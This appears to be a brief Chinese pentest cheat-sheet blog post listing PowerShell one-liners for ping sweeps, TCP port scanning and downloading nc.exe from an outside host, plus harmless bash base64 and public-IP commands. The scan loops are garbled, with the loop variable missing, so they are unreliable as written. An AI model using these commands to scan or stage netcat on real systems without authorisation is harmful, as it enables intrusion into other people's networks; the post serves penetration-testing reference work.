pentest魔法书

2022/1/20 6:44:18

本文主要是介绍pentest魔法书,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

常用命令介绍:
powershell
ping扫描:
1..255 | % {echo "192.168.0.$"; ping -n 1 -w 100 192.168.0.$ | Select-String ttl}
powershell下载:

(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/nc.exe","c:\nc.exe")
Win 8 and later: > wget "http://10.10.10.10/nc.exe" -outfile "c:\nc.exe"
端口扫描:
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.101", $)) "Port $ is open!"} 2>$null

bash
base64编码和解码:
$ echo 'Hello, World!' | base64
$ echo 'SGVsbG8sIFdvcmxkIQo=' | base64 -d
获得公网IP:
curl -4 icanhazip.com
wget -qO- ifconfig.me/ip



这篇关于pentest魔法书的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程